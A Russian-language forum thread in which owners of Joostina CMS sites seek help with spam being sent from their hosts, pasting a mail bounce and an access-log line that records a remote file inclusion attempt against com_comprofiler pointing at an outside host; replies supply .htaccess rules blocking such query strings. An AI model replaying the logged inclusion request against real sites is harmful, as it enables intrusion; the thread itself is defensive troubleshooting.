Спам рассылка с сайта

[чикаго]

На хосте установлена joostina-1.2.0-stable... начиная с сегодняшнего утра мне на админский емайл приходят письма и их уже более 30.000! По ходу дела спамят через com_adsmanager.

письма следующего содержания:

Код:

Hi. This is the qmail-send program at saturn.sweb.ru.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<sell_gm@mail.ru>:
94.100.176.20 failed after I sent the message.
Remote host said: 550 spam message rejected. Please visit http://mail.ru/notspam/ or report details to abuse@corp.mail.ru. Error code: FA981B0A7B7138EE97CBACA399C857C59753D6F7FE0FCE41CF68DE67EE5996CE7DA305EE79E9D145F6C597C7C11ECDBCEF2E18AD7C5B392FD2201BC4D743BC99BEA7A21F28CED95CBDE07253AFC88A38

--- Below this line is a copy of the message.

Return-Path: <MOY-EMAIL@inbox.ru>
Received: (qmail 2378 invoked by uid 1413); 17 Aug 2010 09:09:30 -0000
To: sell_gm@mail.ru
Subject: =?windows-1251?B?wOLy7i3K7vHy8O7s4C7Q0yAtIO/u5OXw5uDt7fvlIODi8u7s7uHo6+gg?= =?windows-1251?B?4iDK7vHy8O7s5S4gz/Du5ODm4Cwg7+7q8+/q4CDg4vLu7O7h6Ovl6SDi?= =?windows-1251?B?IOMuIMru8fLw7uzgIC8gz/Du5O7r5ujy5ev87e7x8vw=?=
Date: Tue, 17 Aug 2010 13:09:30 +0400
From: "moy-host.ru" <MOY-EMAIL@inbox.ru>
Message-ID: <4e131ec33ed28413c207b634d95ed838@moy-host.ru>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="windows-1251"

яПНЙ БЮЬЕЦН НАЗЪБКЕМХЕ МЮ MOY-HOST.RU ХЯРЕЙ. дКЪ ОПНДКЕМХЪ ОСАКХЙЮЖХХ ЯБНЕЦН НАЗЪБКЕМХЪ ОПНЯРН ОЕПЕИДХРЕ ОН ЯЯШКЙЕ. еЯКХ ДЮММНЕ ДЕИЯРБХЕ МЕ РПЕАСЕРЯЪ, ОПНЯРН ОПНХЦМНПХПСИРЕ ЩРН ЯННАЫЕМХЕ. оНФЮКСИЯРЮ МЕ ЯРЕЯМЪИРЕЯЭ ГЮУНДХРЭ Й МЮЛ ЯМНБЮ Х ПЮГЛЕЫЮРЭ ДПСЦХЕ НАЗЪБКЕМХЪ Б МЮЬХУ ПЮГДЕКЮУ. C МЮХКСВЬХЛХ ОНФЕКЮМХЪЛХ ЙНЛЮМДЮ MOY-HOST.RUбЮЬЕ НАЗЪБКЕМХЕ : аНПРНБНИ ЮБРНЛНАХКЭ Я СБЕКХБЕММНИ 6-ЛЕЯРМНИ ЙЮАХМНИ цюг -33 аСДЕР СДЮКЕМН ВЕПЕГ 5 ДМЕИ.<br/> дКЪ ОПНДКЕМХЪ ЯПНЙНБ ПЮГЛЕЫЕМХЪ НАЗЪБКЕМХЪ МЮФЛХРЕ МЮ ЯЯШКЙС МХФЕ.<br/><a href="http://moy-host.ru/component/option,com_adsmanager/page,expiration/adid,1240/">http://moy-host.ru/component/option,com_adsmanager/page,expiration/adid,1240/</a>;

В тех. поддержке хостинга порекомендовали выставить права 000 т.е отключить сайтег вообще... закрыли доступ через браузер к сайту через .htaccess

Интересует имелись ли у кого подобные случаи и собственно дальнейший порядок действий! и... КАК ПРИШИБИТЬ ГАДА?

[чикаго]

письма продолжают идти... блин что делать то?

[ZHart]

IP отправителя один и тот же?
Если да — можно забанить по IP.

[чикаго]

Тему можно грохнуть. Вопрос решен!

[ZHart]

Может поделишься, каким образом решен?

[Lse]

Уважаемые ГУРУ! Помогите решить проблему. Joostina 1.1.3 stable.
Хостер утверждает, что с сайта идет спам рассылка.
Логи;
187.91.41.220 mebel.k3info.ru - [12/Oct/2010:07:24:15 +0400] "POST /index.php?option=com_comprofiler&mosConfig.absolute.path=http://itau2.hut2.ru/testinbox?? HTTP/1.1" 200 7041 "http://k3-mebel.ru/index.php?option=com_comprofiler&mosConfig.absolute.path=http://itau2.hut2.ru/testinbox??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10"

Вопросов два:
1. Это дыра в коде?
2. Как можно заштопать дырку?

[Vladzimir]

Да это дырка в коде.
Для закрытия дырки добавь в файл .htaccess сразу же после RewriteEngine On

Код:

########## Начало - Правила обработки запросов для блокировки распространенных эксплоитов
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
########## Конец - Правила обработки (Rewrite rules) для блокировки распространенных эксплоитов

[Lse]

Во первых эти строки у меня в .htaccess уже есть.

Посмотрел повнимательнее. Поправьте, если я не прав.
В приведенном примере стоит строка:
"RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]"

Это означает, что если в строке запроса встречается подстрока mosConfig_ , то перезапиши запрос  ( RewriteRule ^(.*)$ index.php [F,L] ).

У меня в логах стоит запрос, в котором присутствует строка "mosConfig.". В конце стоит точка, а не знак подчеркивания. Поэтому ( скорее всего) и не работает директива RewriteRule.

Правильно рассуждаю?

[Vladzimir]

Попробуй так

Код:

RewriteCond %{QUERY_STRING} mosConfig[a-zA-Z_\.]{1,21}(=|\%3D) [OR]

[boston]

com_comprofiler какой версии?